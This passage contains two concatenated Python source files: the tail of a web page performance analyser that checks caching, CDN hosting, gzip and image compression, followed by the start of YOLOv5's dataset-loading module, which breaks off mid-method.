if time_remaining == 0:
is_static = False
time_remaining = -1
elif age is not None:
time_remaining -= int(re.search(r'\d+',
str(age).strip()).group())
elif expires is not None:
date = self.get_header_value(request['response_headers'], 'Date')
exp = time.mktime(parsedate(expires))
if date is not None:
now = time.mktime(parsedate(date))
else:
now = time.time()
time_remaining = int(exp - now)
if time_remaining < 0:
is_static = False
except Exception:
pass
return is_static, time_remaining
def check_cache_static(self):
"""Check static resources for how long they are cacheable for"""
for request_id in self.requests:
try:
request = self.requests[request_id]
check = {'score': -1, 'time': 0}
if 'status' in request and request['status'] == 200:
is_static, time_remaining = self.get_time_remaining(request)
if is_static:
check['time'] = time_remaining
if time_remaining >= 604800: # 7 days
check['score'] = 100
elif time_remaining >= 3600: # 1 hour
check['score'] = 50
else:
check['score'] = 0
if check['score'] >= 0:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['cache'] = check
except Exception:
pass
def check_hosting(self):
"""Pull the data needed to determine the hosting"""
start = monotonic.monotonic()
self.hosting_results['base_page_ip_ptr'] = ''
self.hosting_results['base_page_cname'] = ''
self.hosting_results['base_page_dns_server'] = ''
domain = None
if self.task is not None and 'page_data' in self.task and \
'document_hostname' in self.task['page_data']:
domain = self.task['page_data']['document_hostname']
if domain is not None:
try:
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 5
dns_resolver.lifetime = 5
# reverse-lookup the edge server
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
self.hosting_results['base_page_ip_ptr'] = name.strip('. ')
except Exception:
pass
# get the CNAME for the address
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
self.hosting_results['base_page_cname'] = name
break
except Exception:
pass
# get the name server for the domain
done = False
while domain is not None and not done:
try:
dns_servers = dns_resolver.query(domain, "NS")
dns_name = str(dns_servers[0].target).strip('. ')
if dns_name:
self.hosting_results['base_page_dns_server'] = dns_name
done = True
except Exception:
pass
pos = domain.find('.')
if pos > 0:
domain = domain[pos + 1:]
else:
domain = None
except Exception:
pass
self.hosting_time = monotonic.monotonic() - start
def check_cdn(self):
"""Check each request to see if it was served from a CDN"""
from urlparse import urlparse
start = monotonic.monotonic()
# First pass, build a list of domains and see if the headers or domain matches
static_requests = {}
domains = {}
for request_id in self.requests:
request = self.requests[request_id]
is_static, _ = self.get_time_remaining(request)
if is_static:
static_requests[request_id] = True
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
domain = urlparse(url).hostname
if domain is not None:
if domain not in domains:
# Check the domain itself against the CDN list
domains[domain] = ''
provider = self.check_cdn_name(domain)
if provider is not None:
domains[domain] = provider
# Spawn several workers to do CNAME lookups for the unknown domains
count = 0
for domain in domains:
if not domains[domain]:
count += 1
self.dns_lookup_queue.put(domain)
if count:
thread_count = min(10, count)
threads = []
for _ in xrange(thread_count):
thread = threading.Thread(target=self.dns_worker)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
try:
while True:
dns_result = self.dns_result_queue.get_nowait()
domains[dns_result['domain']] = dns_result['provider']
except Exception:
pass
# Final pass, populate the CDN info for each request
for request_id in self.requests:
check = {'score': -1, 'provider': ''}
request = self.requests[request_id]
if request_id in static_requests:
check['score'] = 0
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
domain = urlparse(url).hostname
if domain is not None:
if domain in domains and domains[domain]:
check['score'] = 100
check['provider'] = domains[domain]
if not check['provider'] and 'response_headers' in request:
provider = self.check_cdn_headers(request['response_headers'])
if provider is not None:
check['score'] = 100
check['provider'] = provider
self.cdn_results[request_id] = check
self.cdn_time = monotonic.monotonic() - start
def find_dns_cdn(self, domain, depth=0):
"""Recursively check a CNAME chain"""
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 1
dns_resolver.lifetime = 1
provider = self.check_cdn_name(domain)
# First do a CNAME check
if provider is None:
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
provider = self.check_cdn_name(name)
if provider is None and depth < 10:
provider = self.find_dns_cdn(name, depth + 1)
if provider is not None:
break
except Exception:
pass
# Try a reverse-lookup of the address
if provider is None:
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
provider = self.check_cdn_name(name)
except Exception:
pass
return provider
def dns_worker(self):
"""Handle the DNS CNAME lookups and checking in multiple threads"""
try:
while True:
domain = self.dns_lookup_queue.get_nowait()
provider = self.find_dns_cdn(domain)
if provider is not None:
self.dns_result_queue.put({'domain': domain, 'provider': provider})
self.dns_lookup_queue.task_done()
except Exception:
pass
def check_cdn_name(self, domain):
"""Check the given domain against our cname list"""
if domain is not None and len(domain):
check_name = domain.lower()
for cdn in self.cdn_cnames:
for cname in self.cdn_cnames[cdn]:
if check_name.find(cname) > -1:
return cdn
return None
def check_cdn_headers(self, headers):
"""Check the given headers against our header list"""
matched_cdns = []
for cdn in self.cdn_headers:
for header_group in self.cdn_headers[cdn]:
all_match = True
for name in header_group:
value = self.get_header_value(headers, name)
if value is None:
all_match = False
break
else:
value = value.lower()
check = header_group[name].lower()
if len(check) and value.find(check) == -1:
all_match = False
break
if all_match:
matched_cdns.append(cdn)
break;
if not len(matched_cdns):
return None
return ', '.join(matched_cdns)
def check_gzip(self):
"""Check each request to see if it can be compressed"""
start = monotonic.monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
content_length = self.get_header_value(request['response_headers'],
'Content-Length')
if 'objectSize' in request:
content_length = request['objectSize']
elif content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
elif 'transfer_size' in request:
content_length = request['transfer_size']
if content_length is None:
content_length = 0
check = {'score': 0, 'size': content_length, 'target_size': content_length}
encoding = None
if 'response_headers' in request:
encoding = self.get_header_value(request['response_headers'],
'Content-Encoding')
# Check for responses that are already compressed (ignore the level)
if encoding is not None:
if encoding.find('gzip') >= 0 or \
encoding.find('deflate') >= 0 or \
encoding.find('br') >= 0:
check['score'] = 100
# Ignore small responses that will fit in a packet
if not check['score'] and content_length < 1400:
check['score'] = -1
# Try compressing it if it isn't an image
if not check['score'] and 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type is not None:
check['score'] = -1
else:
out_file = request['body'] + '.gzip'
with open(request['body'], 'rb') as f_in:
with gzip.open(out_file, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
if os.path.isfile(out_file):
target_size = os.path.getsize(out_file)
try:
os.remove(out_file)
except Exception:
pass
if target_size is not None:
delta = content_length - target_size
# Only count it if there is at least 1 packet and 10% savings
if target_size > 0 and \
delta > 1400 and \
target_size < (content_length * 0.9):
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = -1
else:
check['score'] = -1
else:
check['score'] = -1
if check['score'] >= 0:
self.gzip_results[request_id] = check
except Exception:
pass
self.gzip_time = monotonic.monotonic() - start
def check_images(self):
"""Check each request to see if images can be compressed better"""
start = monotonic.monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
content_length = self.get_header_value(request['response_headers'],
'Content-Length')
if content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
elif 'transfer_size' in request:
content_length = request['transfer_size']
check = {'score': -1, 'size': content_length, 'target_size': content_length}
if content_length and 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type == 'jpeg':
if content_length < 1400:
check['score'] = 100
else:
# Compress it as a quality 85 stripped progressive image and compare
jpeg_file = request['body'] + '.jpg'
command = '{0} -define jpeg:dct-method=fast -strip '\
'-interlace Plane -quality 85 '\
'"{1}" "{2}"'.format(self.job['image_magick']['convert'],
request['body'], jpeg_file)
subprocess.call(command, shell=True)
if os.path.isfile(jpeg_file):
target_size = os.path.getsize(jpeg_file)
try:
os.remove(jpeg_file)
except Exception:
pass
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'png':
if 'response_body' not in request:
request['response_body'] = ''
with open(request['body'], 'rb') as f_in:
request['response_body'] = f_in.read()
if content_length < 1400:
check['score'] = 100
else:
# spell-checker: disable
image_chunks = ["iCCP", "tIME", "gAMA", "PLTE", "acTL", "IHDR", "cHRM",
"bKGD", "tRNS", "sBIT", "sRGB", "pHYs", "hIST", "vpAg",
"oFFs", "fcTL", "fdAT", "IDAT"]
# spell-checker: enable
body = request['response_body']
image_size = len(body)
valid = True
target_size = 8
bytes_remaining = image_size - 8
pos = 8
while valid and bytes_remaining >= 4:
chunk_len = struct.unpack('>I', body[pos: pos + 4])[0]
pos += 4
if chunk_len + 12 <= bytes_remaining:
chunk_type = body[pos: pos + 4]
pos += 4
if chunk_type in image_chunks:
target_size += chunk_len + 12
pos += chunk_len + 4 # Skip the data and CRC
bytes_remaining -= chunk_len + 12
else:
valid = False
bytes_remaining = 0
if valid:
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'gif':
if content_length < 1400:
check['score'] = 100
else:
is_animated = False
from PIL import Image
with Image.open(request['body']) as gif:
try:
gif.seek(1)
except EOFError:
is_animated = False
else:
is_animated = True
if is_animated:
check['score'] = 100
else:
# Convert it to a PNG
png_file = request['body'] + '.png'
command = 'convert "{0}" "{1}"'.format(request['body'], png_file)
subprocess.call(command, shell=True)
if os.path.isfile(png_file):
target_size = os.path.getsize(png_file)
try:
os.remove(png_file)
except Exception:
pass
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'webp':
check['score'] = 100
if check['score'] >= 0:
self.image_results[request_id] = check
except Exception:
pass
self.image_time = monotonic.monotonic() - start
def check_progressive(self):
"""Count the number of scan lines in each jpeg"""
from PIL import Image
start = monotonic.monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type == 'jpeg':
check = {'size': os.path.getsize(request['body']), 'scan_count': 1}
image = Image.open(request['body'])
info = dict(image.info)
image.close()
if 'progression' in info and info['progression']:
check['scan_count'] = 0
if 'response_body' not in request:
request['response_body'] = ''
with open(request['body'], 'rb') as f_in:
request['response_body'] = f_in.read()
body = request['response_body']
content_length = len(request['response_body'])
pos = 0
try:
while pos < content_length:
block = struct.unpack('B', body[pos])[0]
pos += 1
if block != 0xff:
break
block = struct.unpack('B', body[pos])[0]
pos += 1
while block == 0xff:
block = struct.unpack('B', body[pos])[0]
pos += 1
if block == 0x01 or (block >= 0xd0 and block <= 0xd9):
continue
elif block == 0xda: # Image data
check['scan_count'] += 1
# Seek to the next non-padded 0xff to find the next marker
found = False
while not found and pos < content_length:
value = struct.unpack('B', body[pos])[0]
pos += 1
if value == 0xff:
value = struct.unpack('B', body[pos])[0]
pos += 1
if value != 0x00:
found = True
pos -= 2
else:
chunk = body[pos: pos + 2]
block_size = struct.unpack('2B', chunk)
pos += 2
block_size = block_size[0] * 256 + block_size[1] - 2
pos += block_size
except Exception:
pass
self.progressive_results[request_id] = check
except Exception:
pass
self.progressive_time = monotonic.monotonic() - start
def get_header_value(self, headers, name):
"""Get the value for the requested header"""
value = None
if headers:
if name in headers:
value = headers[name]
else:
find = name.lower()
for header_name in headers:
check = header_name.lower()
if check == find or (check[0] == ':' and check[1:] == find):
value = headers[header_name]
break
return value
def sniff_content(self, raw_bytes):
"""Check the beginning of the file to see if it is a known image type"""
content_type = None
hex_bytes = binascii.hexlify(raw_bytes[:14]).lower()
# spell-checker: disable
if hex_bytes[0:6] == 'ffd8ff':
content_type = 'jpeg'
elif hex_bytes[0:16] == '89504e470d0a1a0a':
content_type = 'png'
elif raw_bytes[:6] == 'GIF87a' or raw_bytes[:6] == 'GIF89a':
content_type = 'gif'
elif raw_bytes[:4] == 'RIFF' and raw_bytes[8:14] == 'WEBPVP':
content_type = 'webp'
elif raw_bytes[:4] == 'wOF2':
content_type = 'WOFF2'
# spell-checker: enable
return content_type
def sniff_file_content(self, image_file):
"""Sniff the content type from a file"""
content_type = None
with open(image_file, 'rb') as f_in:
raw = f_in.read(14)
content_type = self.sniff_content(raw)
return content_type
|
datasets.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import Pool, ThreadPool
from pathlib import Path
from threading import Thread
from zipfile import ZipFile
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import DataLoader, Dataset, dataloader, distributed
from tqdm import tqdm
from utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from utils.general import (DATASETS_DIR, LOGGER, NUM_THREADS, check_dataset, check_requirements, check_yaml, clean_str,
segments2boxes, xyn2xy, xywh2xyxy, xywhn2xyxy, xyxy2xywhn)
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = 'bmp', 'dng', 'jpeg', 'jpg', 'mpo', 'png', 'tif', 'tiff', 'webp' # include image suffixes
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except Exception:
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix='', shuffle=False):
if rect and shuffle:
LOGGER.warning('WARNING: --rect is incompatible with DataLoader shuffle, setting shuffle=False')
shuffle = False
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augmentation
hyp=hyp, # hyperparameters
rect=rect, # rectangular batches
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nd = torch.cuda.device_count() # number of CUDA devices
nw = min([os.cpu_count() // max(nd, 1), batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
loader = DataLoader if image_weights else InfiniteDataLoader # only DataLoader allows for attribute updates
return loader(dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn), dataset
class InfiniteDataLoader(dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
while not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
s = f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: '
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, f'Image Not Found {path}'
s = f'image {self.count}/{self.nf} {path}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap, s
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
# YOLOv5 local webcam dataloader, i.e. `python detect.py --source 0`
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
s = f'webcam {self.count}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None, s
def __len__(self):
return 0
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources) as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f'{i + 1}/{n}: {s}... '
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl==2020.12.2'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'{st}Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) # warning: may return 0 or nan
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
self.fps[i] = max((fps if math.isfinite(fps) else 0) % 100, 0) or 30 # 30 FPS fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
LOGGER.info(f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
LOGGER.info('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
LOGGER.warning('WARNING: Stream shapes differ. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warning('WARNING: Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] = np.zeros_like(self.imgs[i])
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None, ''
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.im_files = sorted(x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.im_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
self.label_files = img2label_paths(self.im_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == self.cache_version # same version
assert cache['hash'] == get_hash(self.label_files + self.im_files) # same hash
except Exception:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupt, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupt"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
if cache['msgs']:
LOGGER.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.im_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
if segment:
self.segments[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.im_files = [self.im_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into RAM/disk for faster training (WARNING: large datasets may exceed system resources)
self.ims = [None] * n
self.npy_files = [Path(f).with_suffix('.npy') for f in self.im_files]
if cache_images:
gb = 0 # Gigabytes of cached images
self.im_hw0, self.im_hw = [None] * n, [None] * n
fcn = self.cache_images_to_disk if cache_images == 'disk' else self.load_image
results = ThreadPool(NUM_THREADS).imap(fcn, range(n))
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
if cache_images == 'disk':
gb += self.npy_files[i].stat().st_size
else: # 'ram'
self.ims[i], self.im_hw0[i], self.im_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.ims[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.im_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.im_files))
for im_file, lb, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [lb, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupt"
pbar.close()
if msgs:
LOGGER.info('\n'.join(msgs))
if nf == 0:
LOGGER.warning(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.im_files)
x['results'] = nf, nm, ne, nc, len(self.im_files)
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
LOGGER.info(f'{prefix}New cache created: {path}')
except Exception as e:
LOGGER.warning(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # not writeable
return x
def __len__(self):
return len(self.im_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = self.load_mosaic(index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *self.load_mosaic(random.randint(0, self.n - 1)))
